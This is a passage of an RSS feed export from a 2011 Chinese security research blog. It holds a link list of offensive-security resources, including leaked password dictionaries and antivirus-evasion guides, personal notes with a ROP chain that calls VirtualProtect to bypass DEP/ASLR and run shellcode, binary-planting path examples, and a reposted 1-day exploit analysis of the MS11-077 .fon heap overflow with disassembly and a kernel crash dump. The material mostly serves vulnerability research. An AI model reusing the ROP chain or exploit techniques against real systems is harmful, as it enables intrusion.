[ExplotDev] Metasploit Exploits Wishlist !  &#8211; http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html<br />
[Guide] Porting Exploits To Metasploit Part 1 &#8211; http://www.securitytube.net/video/2118</p>
<p>Passwords &#038; Rainbow Tables (WPA)<br />
[RSS] Title &#8211; http://ob-security.info/?p=475<br />
[RSS] Title &#8211; http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/<br />
[RSS] Title &#8211; http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html<br />
[WPA] Offensive Security: WPA Rainbow Tables &#8211; http://www.offensive-security.com/wpa-tables/<br />
[Tool] Ultra High Security Password Generator &#8211; https://www.grc.com/passwords.htm<br />
[Guide] Creating effective dictionaries for password attacks  &#8211; http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html<br />
[Leaked] Diccionarios con Passwords de Sitios Expuestos &#8211; http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml<br />
[Download] Index of / &#8211; http://svn.isdpodcast.com/wordlists/<br />
[Guide] Using Wikipedia as brute forcing dictionary &#8211; http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary<br />
[Tool] CeWL &#8211; Custom Word List generator &#8211; http://www.digininja.org/projects/cewl.php<br />
[Download] Title &#8211; http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists<br />
[Leaked] Passwords &#8211; http://www.skullsecurity.org/wiki/index.php/Passwords</p>
<p>Cheat-Sheets<br />
[OS] A Sysadmin&#8217;s Unixersal Translator  &#8211; http://bhami.com/rosetta.html<br />
[WiFi] WirelessDefence.org&#8217;s Wireless Penetration Testing Framework &#8211; http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html</p>
<p>Anti-Virus<br />
[Metasploit] Facts and myths about antivirus evasion with Metasploit &#8211; http://schierlm.users.sourceforge.net/avevasion.html<br />
[Terms] Methods of bypassing Anti-Virus (AV) Detection &#8211; NetCat &#8211; http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html</p>
<p>Privilege Escalation<br />
[Linux] Hacking Linux Part I: Privilege Escalation &#8211; http://www.dankalia.com/tutor/01005/0100501004.htm<br />
[Windows] Windows 7 UAC whitelist &#8211; http://www.pretentiousname.com/misc/win7_uac_whitelist2.html<br />
[Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges &#8211; http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/ </p>
<p>Metasploit<br />
[Guide] fxsst.dll persistence: the evil fax machine &#8211; http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html<br />
[Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec &#8211; http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/<br />
[Guides] Metasploit Unleashed &#8211; http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training<br />
[Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 &#8211; http://www.securitytube.net/video/1175</p>
<p>Default Generators<br />
[WEP] mac2wepkey &#8211; Huawei default WEP generator &#8211; http://websec.ca/blog/view/mac2wepkey_huawei<br />
[WEP] Generator: Attacking SKY default router password &#8211; http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password</p>
<p>Statistics<br />
[Defacements] Zone-H &#8211; http://www.zone-h.org<br />
[ExploitKits] CVE Exploit Kit list &#8211; http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm</p>
<p>Cross Site Scripting (XSS)<br />
[Guide] vbSEO – From XSS to Reverse PHP Shell &#8211; http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/<br />
[RSS] Title &#8211; http://www.thespanner.co.uk/2009/03/25/xss-rays/ </p>
<p>Podcasts<br />
[Weekly] PaulDotCom &#8211; http://pauldotcom.com/podcast/psw.xml<br />
[Monthly] Social-Engineer &#8211; http://socialengineer.podbean.com/feed/</p>
<p>Blogs &#038; RSS<br />
[RSS] SecManiac &#8211; http://www.secmaniac.com<br />
[Guides] Carnal0wnage &#038; Attack Research &#8211; http://carnal0wnage.attackresearch.com<br />
[RSS] Contagio &#8211; http://contagiodump.blogspot.com<br />
[News] THN : The Hacker News &#8211; http://thehackernews.com<br />
[News] Packet Storm: Full Disclosure Information Security &#8211; http://packetstormsecurity.org<br />
[Guides] pentestmonkey | Taking the monkey work out of pentesting &#8211; http://pentestmonkey.net<br />
[RSS] Darknet &#8211; The Darkside | Ethical Hacking, Penetration Testing &#038; Computer Security &#8211; http://www.darknet.org.uk<br />
[RSS] Irongeek &#8211; http://www.irongeek.com<br />
[Metasploit] Room 363 &#8211; http://www.room362.com<br />
[Guides] Question Defense: Technology Answers For Technology Questions &#8211; http://www.question-defense.com/<br />
[Guides] stratmofo&#8217;s blog  &#8211; http://securityjuggernaut.blogspot.com<br />
[Guides] TheInterW3bs &#8211; http://theinterw3bs.com</p>
<p>[Guides] consolecowboys &#8211; http://console-cowboys.blogspot.com<br />
[Guides] A day with Tape &#8211; http://adaywithtape.blogspot.com<br />
[Guides] Cybexin&#8217;s Blog &#8211; Network Security Blog &#8211; http://cybexin.blogspot.com</p>
<p>[RSS] BackTrack Linux &#8211; Penetration Testing Distribution &#8211; http://www.backtrack-linux.org/feed/<br />
[RSS] Offensive Security &#8211; http://www.offensive-security.com/blog/feed/</p>
<p>[RSS] Title &#8211; http://www.pentestit.com<br />
[RSS] Title &#8211; http://michael-coates.blogspot.com<br />
[RSS] Title &#8211; http://blog.0x0e.org<br />
[RSS] Title &#8211; http://0&#215;80.org/blog<br />
[RSS] Title &#8211; http://archangelamael.shell.tor.hu<br />
[RSS] Title &#8211; http://archangelamael.blogspot.com<br />
[RSS] Title &#8211; http://www.coresec.org<br />
[RSS] Title &#8211; http://noobys-journey.blogspot.com<br />
[RSS] Title &#8211; http://www.get-root.com<br />
[RSS] Title &#8211; http://www.kislaybhardwaj.com<br />
[RSS] Title &#8211; https://community.rapid7.com/community/metasploit/blog<br />
[RSS] Title &#8211; http://mimetus.blogspot.com<br />
[RSS] Title &#8211; http://hashcrack.blogspot.com<br />
[RSS] Title &#8211; https://rephraseit.wordpress.com<br />
[RSS] Title &#8211; http://www.exploit-db.com<br />
[RSS] Title &#8211; http:/skidspot.blogspot.com<br />
[RSS] Title &#8211; http://grey-corner.blogspot.com<br />
[RSS] Title &#8211; http://vishnuvalentino.com<br />
[RSS] Title &#8211; http://ob-security.info</p>
<p>&#8230;. Not enough? Try twitter and/or IRC!</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/10/recent-life/' rel='bookmark' title='Permanent Link: recent life'>recent life</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/top-ten-web-hacking-techniques-of-2009/' rel='bookmark' title='Permanent Link: Top Ten Web Hacking Techniques of 2009!'>Top Ten Web Hacking Techniques of 2009!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>记事</title>
		<link>http://cq-cser.cn/2011/11/what_ever/</link>
		<comments>http://cq-cser.cn/2011/11/what_ever/#comments</comments>
		<pubDate>Wed, 02 Nov 2011 06:23:21 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1515</guid>
		<description><![CDATA[http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log // We crash inside this function // In swscale.c: Function &#8216;simpleCopy&#8217; // Line: 1961 &#8211; Buffer Overrun // This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B) 搞了好久才无意发现是这个。暂时不好利用。待定了。 枉费我在没SYMBOLS的情况下搞了好久，心碎啊，教训教训。。 While this DLL seems interesting, it does not [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><span id="more-1515"></span><!--more-->http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log<br />
// We crash inside this function<br />
// In swscale.c: Function &#8216;simpleCopy&#8217;<br />
// Line: 1961 &#8211; Buffer Overrun<br />
// This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B)<br />
搞了好久才无意发现是这个。暂时不好利用。待定了。<br />
枉费我在没SYMBOLS的情况下搞了好久，心碎啊，教训教训。。</p>
<p>While this DLL seems interesting, it does not import VirtualAlloc, VirtualProtect, HeapCreate, WriteMemory or even a LoadLibrary, which complicates exploitation. However, the attacker did find and use other functions: </p>
<p>4A84903C CreateFileA                // create the file iso88591<br />
4A849038 CreateFileMappingA    // attrib RWE<br />
4A849030 MapViewOfFile            // load this file in memory with RWE flags<br />
4A849170 memcpy                    // copy the payload</p>
<p>The idea of the attacker was to spray the heap with a ROP pattern, followed by the shellcode. It first creates a file (iso88591) on disk, loads it with RWE attributes, copies the payload in memory and eventually executes the shellcode.</p>
<p>新思路，BYPASS DEP ASLR .</p>
<p>rop = [<br />
	rop_base + 0x1022,		# retn</p>
<p>	# Write lpfOldProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	heap - 0x1000,			# lpfOldProtect -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write flNewProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	0&#215;40,				# flNewProtect -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write dwSize<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	0&#215;60000,			# dwSize -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write lpAddress<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	heap &#038; ~0xfff,			# lpAddress -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write &#038;Pivot<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	rop_base + 0x229a5,		# &#038;pivot -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write &#038;VirtualProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	rop_base + 0x1212a4,		# IAT entry for VirtualProtect -> eax<br />
	rop_base + 0x12fda,		# mov eax,DWORD PTR [eax]<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn</p>
<p>	# Pivot ESP<br />
	rop_base + 0x229a5,		# xchg esi,esp; retn;</p>
<p>	# Jump into shellcode<br />
	rop_base + 0xdace8              # push esp; retn<br />
]<br />
WIN8上的ROP，有点小变化啦。</p>
<p>https://code.google.com/p/address-sanitizer/</p>
<p>貌似最近CHROME用这东东发现不少use-after-free and out-of-bound bugs<br />
标记+1啦～</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/what_ever/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>recent life</title>
		<link>http://cq-cser.cn/2011/10/recent-life/</link>
		<comments>http://cq-cser.cn/2011/10/recent-life/#comments</comments>
		<pubDate>Tue, 25 Oct 2011 08:55:36 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1506</guid>
		<description><![CDATA[chrome 待定 http://code.google.com/p/selenium/wiki/JsonWireProtocol http://www.chromium.org/developers/testing/webdriver-for-chrome/chromedriver-internals http://selenium.googlecode.com/svn/trunk/docs/api/java/org/openqa/selenium/chrome/ChromeDriver.html http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/REVISIONS http://src.chromium.org/svn/trunk/ http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/chrome-win32.test/ . binary_planting 系列,GOOD! http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html http://www.binaryplanting.com/guidelinesDevelopers.htm http://www.binaryplanting.com/test.htm this problem also affects the way Windows processes are launched via various functions such as CreateProcess*, ShellExecute*, WinExec, LoadModule, _spawn*p* and _exec*p*. library=c:\temp\malicious.dll library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib derbycon2011 http://www.irongeek.com/i.php?page=videos/derbycon1/tony-huffman-myne-us-when-fuzzers-miss-the-no-hanging-fruit bot funny! http://www.m86security.com/labs/bot_statistics.asp autocomplete stolen http://blog.mindedsecurity.com/2011/10/autocompleteagain.html WEB指纹识别 http://sebug.net/chweb/ peachfuzz http://peachfuzzer.com/TutorialNetworkServer 另 https://media.blackhat.com/bh-us-11/Cerrudo/BH_US_11_Cerrudo_Vulnerability_Hunting_Windows_Slides.pdf 此文系慢慢看 No related [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p><a href="http://cq-cser.cn/wp-content/uploads/2011/10/12.png"><img src="http://cq-cser.cn/wp-content/uploads/2011/10/12.png" alt="" title="1" width="721" height="455" class="aligncenter size-full wp-image-1512" /></a><br />
<span id="more-1506"></span>chrome 待定</p>
<p>http://code.google.com/p/selenium/wiki/JsonWireProtocol</p>
<p>http://www.chromium.org/developers/testing/webdriver-for-chrome/chromedriver-internals</p>
<p>http://selenium.googlecode.com/svn/trunk/docs/api/java/org/openqa/selenium/chrome/ChromeDriver.html</p>
<p>http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/REVISIONS</p>
<p>http://src.chromium.org/svn/trunk/</p>
<p>http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/chrome-win32.test/ .</p>
<p>binary_planting 系列,GOOD!</p>
<p>http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html</p>
<p>http://www.binaryplanting.com/guidelinesDevelopers.htm</p>
<p>http://www.binaryplanting.com/test.htm</p>
<p>this problem also affects the way Windows processes are launched via various functions<br />
such as CreateProcess*, ShellExecute*, WinExec, LoadModule, _spawn*p* and _exec*p*.<br />
library=c:\temp\malicious.dll<br />
library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib</p>
<p>derbycon2011</p>
<p>http://www.irongeek.com/i.php?page=videos/derbycon1/tony-huffman-myne-us-when-fuzzers-miss-the-no-hanging-fruit</p>
<p>bot funny!</p>
<p>http://www.m86security.com/labs/bot_statistics.asp</p>
<p>autocomplete stolen</p>
<p>http://blog.mindedsecurity.com/2011/10/autocompleteagain.html</p>
<p>WEB指纹识别</p>
<p>http://sebug.net/chweb/</p>
<p>peachfuzz</p>
<p>http://peachfuzzer.com/TutorialNetworkServer</p>
<p>另</p>
<p>https://media.blackhat.com/bh-us-11/Cerrudo/BH_US_11_Cerrudo_Vulnerability_Hunting_Windows_Slides.pdf</p>
<p>此文系慢慢看</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/10/recent-life/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>darungrim</title>
		<link>http://cq-cser.cn/2011/10/darungrim/</link>
		<comments>http://cq-cser.cn/2011/10/darungrim/#comments</comments>
		<pubDate>Sat, 15 Oct 2011 03:51:52 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1502</guid>
		<description><![CDATA[DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it&#8217;s fixing. You can use that information to learn [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/' rel='bookmark' title='Permanent Link: WAR3格式'>WAR3格式</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.<span id="more-1502"></span><br />
Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it&#8217;s fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It&#8217;s also used to write 1-day exploits by malware writers or security researchers. </p>
<p>http://www.darungrim.org/</p>
<p>另转贴几篇文，墙什么的真DT。<br />
原文在这里：http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/<br />
MS11-077: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)<br />
Posted: 2011/10/12 | Author: lifeasageek | Filed under: Uncategorized |Leave a comment »<br />
Download MS11-077 .fon buffer overrun exploit : my.fon.tar.gz<br />
Download very simple *.fon* fuzzer like tool : ms11-077-fon-exploit.tar.gz</p>
<p>Related CVEs<br />
Font Library File Buffer Overrun Vulnerability – CVE-2011-2003</p>
<p>Diffing Binary Information<br />
win32k.sys win32k.dll: 6.1.7601.21744 (win7sp1_ldr.110610-1504) VS 6.1.7601.21811 (win7sp1_ldr.110905-1505) (on Windows 7, 32bit)</p>
<p>Descriptions<br />
This posting is no technical analysis, but it is driven by hardcore &#038; intuition based analysis to make 1-day exploit.</p>
<p>MS11-077 was confusing at the first time. Because it involves 4 different vulnerabilities, we should try to match up these vulnerabilities whenever we reverse engineer the function. This time I will not show the DarunGrim diffing results cause it showed around 50 different functions! Don’t get frustrated though. It’s not going to take that long time to take a look all of them. Within 10 secs for each of the function, you might be able to decide whether the function is interesting or not.</p>
<p>Before getting to the details, you may also look into these. Three functions seem to be related to the null dereference bugs (_NtUserfnINLBOXSTRING(), _NtUserfnSENTDDEMSG(), _InterQueueMsgCleanup()). The function, _ConvertToAndFromWideChar(), seem to be related to “Win32k Use After Free Vulnerability – CVE-2011-2011″. You must be able to understand what I am meaning by here as soon as you open up these functions with DarunGrim.</p>
<p>What I want to focus in this post is .FON buffer overrun bug (CVE-2011-2003). From DarunGrim diffing result, _BmfdOpenFontContext() showed the different point below.</p>
<p>What ??? Patched version only adds immediate value ’5′ to some value (add eax, 5), and that computed value is related to decide the size of allocation. Seems interesting but strange. It is time to see the details to understand the contexts. Here goes the disassembly around the changed BB of the old win32k.sys.</p>
<p>.text:90857F82 loc_90857F82: ; CODE XREF: BmfdOpenFontContext(x)+E2j<br />
.text:90857F82 mov eax, [ebp+numElement]<br />
.text:90857F85 add eax, 7<br />
.text:90857F88 shr eax, 3<br />
.text:90857F8B mov [ebp+var_4], ecx<br />
.text:90857F8E cmp eax, 100h<br />
.text:90857F93 jbe short loc_90857FA1<br />
.text:90857F95 add eax, 28h<br />
.text:90857F98 mov [ebp+var_4], 3<br />
.text:90857F9F jmp short loc_90857FA4<br />
.text:90857FA1<br />
.text:90857FA1 loc_90857FA1: ; CODE XREF: BmfdOpenFontContext(x)+E7j<br />
.text:90857FA1 ; BmfdOpenFontContext(x)+FAj<br />
.text:90857FA1 mov eax, [ebp+preDefinedSize]<br />
.text:90857FA4<br />
.text:90857FA4 loc_90857FA4: ; CODE XREF: BmfdOpenFontContext(x)+106j<br />
.text:90857FA4 push 64666D42h ; Tag<br />
.text:90857FA9 push eax ; int<br />
.text:90857FAA push 0 ; char<br />
.text:90857FAC call _EngAllocMem@12 ; EngAllocMem(x,x,x)</p>
<p>This is the pseudo-code of these assembly. The variable naming was done at my convenience.</p>
<p>uint preDefinedSize = 0&#215;28; // mov dword ptr [ebp-14h], 28h<br />
sizeToAllocate = (numElement + 7) / 8;</p>
<p>if( sizeToAllocate <= 0×100)<br />
sizeToAllocate = preDefinedSize;<br />
else<br />
sizeToAllocate += 0×28;</p>
<p>EngAllocMem(0, sizeToAllocate, 0x64666d42);</p>
<p>All right. In the patched version, the sizeToAllocate variable would be computed as “((numElement + 7) / 8 ) + 5″. After spending some time, we suspected some range of the values, which should have taken ‘else’ branch, mistakenly took ‘then’ branch. Because it took ‘then’ branch, the allocated size was too small and this small size of allocation would lead to buffer overrun later (We understand this interpretation is far from scientific or logical reverse engineering, but you should know that this sloppy logic is enough to write an 1-day exploit.)</p>
<p>More specifically, we suspected the numElement values, satisfying 0xaa <= (numElement +7) /8 <= 0×100, would cause trouble (though we don’t know why and how !). We got this false fail idea in the patched binary from D. Brumeley et al.’s paper, “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications” (http://www.cs.berkeley.edu/~dawnsong/papers/apeg.pdf).</p>
<p>Things are getting clear. Our goal should be to find the input which satisfies the above statement. From the MS technet description, “improper handling of a specially crafted .fon font file”, and the function name _BmfdOpenFontContext(), which implies bitmap font driver something, we decided to manipulate .fon file. To play with .fon files, we implemented very simple ‘.fon’ file format recognizing fuzzer like tool. Using this tool, we figured ‘width’ field is related (see our *fuzzer* for details) to control numElement variable, and it leads to ‘heap overflow’ when the variable satisfies the vulnerable condition. What’s the interesting is that you only need to visit the directly containing .fon file to trigger bitmap font driver routines </p>
<p>I am attaching the .fon font file generated by our python codes (upon mkwinfont by Simon Tatham) and windbg crash dumps. We are not sure this bug can actually be used to execute the arbitrary codes, but we’d like to leave this question to you guys.</p>
<p>Download MS11-077 .fon buffer overrun exploit : my.fon.tar.gz<br />
Download very simple *.fon* fuzzer like tool : ms11-077-fon-exploit.tar.gz</p>
<p>Breakpoint 1 hit<br />
win32k!BmfdOpenFontContext+0xec:<br />
90857f85 83c007 add eax,7<br />
kd> r<br />
eax=00000730 ebx=fe9aacf0 ecx=00000001 edx=00000001 esi=00000028 edi=fe7fc1f8<br />
eip=90857f85 esp=8a2af8d0 ebp=8a2af904 iopl=0 nv up ei pl nz na pe nc<br />
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000206<br />
win32k!BmfdOpenFontContext+0xec:<br />
90857f85 83c007 add eax,7<br />
kd> r eax<br />
eax=00000730<br />
kd> p<br />
win32k!BmfdOpenFontContext+0xef:<br />
90857f88 c1e803 shr eax,3<br />
kd> p<br />
win32k!BmfdOpenFontContext+0xf2:<br />
90857f8b 894dfc mov dword ptr [ebp-4],ecx<br />
kd> r eax<br />
eax=000000e6<br />
kd> g</p>
<p>*** Fatal System Error: 0×00000019<br />
(0×00000020,0xFE1ED440,0xFE1ED5A0,0x4A2C000C)</p>
<p>Break instruction exception – code 80000003 (first chance)</p>
<p>A fatal system error has occurred.<br />
Debugger entered on first try; Bugcheck callbacks have not been invoked.</p>
<p>A fatal system error has occurred.</p>
<p>Connected to Windows 7 7600 x86 compatible target at (Wed Oct 12 18:38:42.012 2011 (UTC – 4:00)), ptr64 FALSE<br />
Loading Kernel Symbols<br />
………………………………………………………<br />
……………………………………………………….<br />
…………………..<br />
Loading User Symbols<br />
…………….<br />
Loading unloaded module list<br />
…..<br />
*******************************************************************************<br />
* *<br />
* Bugcheck Analysis *<br />
* *<br />
*******************************************************************************</p>
<p>Use !analyze -v to get detailed debugging information.</p>
<p>BugCheck 19, {20, fe1ed440, fe1ed5a0, 4a2c000c}</p>
<p>Probably caused by : win32k.sys ( win32k!EngFreeMem+1f )</p>
<p>Followup: MachineOwner<br />
———</p>
<p>nt!RtlpBreakWithStatusInstruction:<br />
828be394 cc int 3<br />
kd> !analyze -v<br />
*******************************************************************************<br />
* *<br />
* Bugcheck Analysis *<br />
* *<br />
*******************************************************************************</p>
<p>BAD_POOL_HEADER (19)<br />
The pool is already corrupt at the time of the current request.<br />
This may or may not be due to the caller.<br />
The internal pool links must be walked to figure out a possible cause of<br />
the problem, and then special pool applied to the suspect tags or the driver<br />
verifier to a suspect driver.<br />
Arguments:<br />
Arg1: 00000020, a pool block header size is corrupt.<br />
Arg2: fe1ed440, The pool entry we were looking for within the page.<br />
Arg3: fe1ed5a0, The next pool entry.<br />
Arg4: 4a2c000c, (reserved)</p>
<p>Debugging Details:<br />
——————</p>
<p>BUGCHECK_STR: 0x19_20</p>
<p>POOL_ADDRESS: fe1ed440 Paged session pool</p>
<p>DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT</p>
<p>PROCESS_NAME: csrss.exe</p>
<p>CURRENT_IRQL: 2</p>
<p>LAST_CONTROL_TRANSFER: from 8292fe71 to 828be394</p>
<p>STACK_TEXT:<br />
8a2af3b4 8292fe71 00000003 dda0d4a7 00000065 nt!RtlpBreakWithStatusInstruction<br />
8a2af404 8293096d 00000003 fe1ed440 000001ff nt!KiBugCheckDebugBreak+0x1c<br />
8a2af7c8 829721b6 00000019 00000020 fe1ed440 nt!KeBugCheck2+0x68b<br />
8a2af844 9088c189 fe1ed448 00000000 fe7fc1d8 nt!ExFreePoolWithTag+0x1b1<br />
8a2af858 90950204 fe1ed458 90959cdf fe40f480 win32k!EngFreeMem+0x1f<br />
8a2af86c 90959cf5 fe1ed458 8a2af8d8 8a2af8b4 win32k!BmfdCloseFontContext+0×41<br />
8a2af87c 90965501 fe40f480 00000000 8a2af930 win32k!BmfdDestroyFont+0×16<br />
8a2af8b4 90965554 fe40f480 00000000 8a2afc70 win32k!PDEVOBJ::DestroyFont+0×67<br />
8a2af8e4 908d0d1e 00000000 8a2af910 00000001 win32k!RFONTOBJ::vDeleteRFONT+0×33<br />
8a2af928 908d2d15 fe40f480 050a071e 8a2afc70 win32k!RFONTOBJ::bMakeInactiveHelper+0x25a<br />
8a2af984 908fba77 00000000 8a2afc70 00000000 win32k!RFONTOBJ::vMakeInactive+0×72<br />
8a2afa04 908fbd74 8a2afc3c 00000000 00000004 win32k!RFONTOBJ::bInit+0xe3<br />
8a2afa1c 908a4b2b 8a2afc3c 00000000 00000004 win32k!RFONTOBJ::vInit+0×16<br />
8a2afcb8 908a4a2f 69010742 00000340 00000040 win32k!GreGetCharABCWidthsW+0×86<br />
8a2afd14 8289642a 69010742 00000340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8<br />
8a2afd14 76f864f4 69010742 00000340 00000040 nt!KiFastCallEntry+0x12a<br />
0435e9ac 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet</p>
<p>STACK_COMMAND: kb</p>
<p>FOLLOWUP_IP:<br />
win32k!EngFreeMem+1f<br />
9088c189 5e pop esi</p>
<p>SYMBOL_STACK_INDEX: 4</p>
<p>SYMBOL_NAME: win32k!EngFreeMem+1f</p>
<p>FOLLOWUP_NAME: MachineOwner</p>
<p>MODULE_NAME: win32k</p>
<p>IMAGE_NAME: win32k.sys</p>
<p>DEBUG_FLR_IMAGE_TIMESTAMP: 4a5bc2a2</p>
<p>FAILURE_BUCKET_ID: 0x19_20_win32k!EngFreeMem+1f</p>
<p>BUCKET_ID: 0x19_20_win32k!EngFreeMem+1f</p>
<p>Followup: MachineOwner</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/12/war3%e6%a0%bc%e5%bc%8f/' rel='bookmark' title='Permanent Link: WAR3格式'>WAR3格式</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/10/darungrim/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>qtweb3.7.2</title>
		<link>http://cq-cser.cn/2011/10/qtweb3-7-2/</link>
		<comments>http://cq-cser.cn/2011/10/qtweb3-7-2/#comments</comments>
		<pubDate>Wed, 05 Oct 2011 04:47:13 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[POC]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1493</guid>
